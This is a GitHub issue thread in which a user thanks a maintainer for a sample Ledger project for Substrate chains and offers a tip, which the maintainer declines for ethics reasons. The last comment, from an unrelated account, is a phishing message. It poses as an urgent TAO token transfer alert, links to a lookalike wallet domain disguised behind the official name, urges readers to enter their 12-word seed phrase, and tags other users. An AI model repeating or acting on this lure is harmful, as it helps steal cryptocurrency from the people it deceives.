### ISSUE TITLE
Missing tip address. Please read.

### ISSUE THREAD

**Issue by blockchainenthusiast** [jacogr/api-test-4450#1]
Hello there Mr. Greeff I was unable to find anyway to contact you so I figured you would see this message especially since you just updated this repository.  

I'll be brief. Recently, I spent about a month conversing with my ledger about why it should work with substrate chains. Unfortunately the device never responded, I guess its not much of a conversationalist lol. Anyways after trying multiple solutions that I read about, I came across your sample ledger project and tested it out. Glad to say it worked. Thank you for publishing it on GitHub. I'd like to nominate you to the ksm/dot councils for a tip because the solution helped me unlock my account and now gives me access to the locked crowdloan rewards which means I can now use the dapps and participate in the growth of the dotsama communities. So, may I have an address that I can put in the beneficiary slot when I request the tip? If not its fine, I could just make a proposal without your address but I did want to make an effort to give credit where it is due.

Thanks again, I hope to hear back soon.

**Comment by jacogr** [comment]
I'm happy it helped you. The actual fact that it did help is enough of a tip.

Since I'm on both KSM/DOT councils at this point and also paid to work in the ecosystem, means that I don't want accept tips, i.e. I would rather send them back to the treasury. It is a grey area for me on accepting these since I can even vote on my own, so I'd rather be 100% clear that I won't accept them, instead ending up in some morally weird situation.

**Comment by blockchainenthusiast** [comment]
Understood, thanks for the reply and the solution. I appreciate your work on the dotsama ecosystem.

**Comment by blockchainenthusiast** [comment]
May I at least get a twitter or social media channel?

**Comment by jacogr** [comment]
Sorry for the late replay here, my queue was/is overflowing a tiny bit. I'm not really active on social media (GH really keeps me busy 7 days a week), this is a ghost town - https://twitter.com/jacogr

**Comment by 3asoftwareltda** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @svenswinden, @latatoro, @estrattonbailey, @striffindor, @Awea, @tymat, @hzhu
